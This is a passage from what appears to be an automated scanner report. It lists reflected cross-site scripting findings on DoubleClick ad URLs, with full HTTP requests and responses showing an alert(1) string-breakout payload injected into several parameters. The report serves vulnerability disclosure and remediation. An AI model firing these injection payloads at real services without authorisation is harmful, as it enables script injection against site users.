GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807c6884"-alert(1)-"7d9b4c2e543&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:52:59 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807c6884"-alert(1)-"7d9b4c2e543&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE840724%26cssiteid%3D1004575%26csdartid%3D6115818341094506");
var fscUrl = ur
...[SNIP]...

5.60. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f98"-alert(1)-"8c42d1cf222 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=116f98"-alert(1)-"8c42d1cf222&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:51:23 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
HR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=116f98"-alert(1)-"8c42d1cf222&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE840724%
...[SNIP]...

5.61. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc18b"-alert(1)-"bd786cf5675 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTwcc18b"-alert(1)-"bd786cf5675&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:52:12 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
aW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTwcc18b"-alert(1)-"bd786cf5675&client=ca-pub-9674942009345807&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE840724%26cssiteid%3D1004575%26csdartid%3D61158
...[SNIP]...

5.62. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d27"-alert(1)-"77fb79f0b33 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=Ld0d27"-alert(1)-"77fb79f0b33&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:50:06 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1de/%2a/b%3B238011044%3B0-0%3B0%3B61158183%3B2321-160/600%3B41094506/41112293/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Ld0d27"-alert(1)-"77fb79f0b33&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2
...[SNIP]...

5.63. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6718e"-alert(1)-"d173b19848f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=6718e"-alert(1)-"d173b19848f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7172
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:47:56 GMT
Expires: Wed, 11 May 2011 15:47:56 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
AQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=6718e"-alert(1)-"d173b19848fhttp://hiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml?WT.mc_id=zkdCSAA0US1GI2DMH3Default4AAA7BR841270&cssiteid=1004575&csdartid=6332572641899793");
var fscUrl = url;
var fscU
...[SNIP]...

5.64. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c823"-alert(1)-"cae5aaf7af1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ6c823"-alert(1)-"cae5aaf7af1&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:51 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ6c823"-alert(1)-"cae5aaf7af1&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3De
...[SNIP]...

5.65. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91b9"-alert(1)-"9780ca6bc9b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807d91b9"-alert(1)-"9780ca6bc9b&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:47:09 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
TBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807d91b9"-alert(1)-"9780ca6bc9b&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3Default4AAA7BR841270%26cssiteid%3D1004575%26csdartid%3D6332572641899793");
va
...[SNIP]...

5.66. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 196aa"-alert(1)-"48bf399ba01 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1196aa"-alert(1)-"48bf399ba01&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:45:34 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
zsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1196aa"-alert(1)-"48bf399ba01&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3Default4
...[SNIP]...

5.67. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22619"-alert(1)-"516c1086529 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g22619"-alert(1)-"516c1086529&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:46:22 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
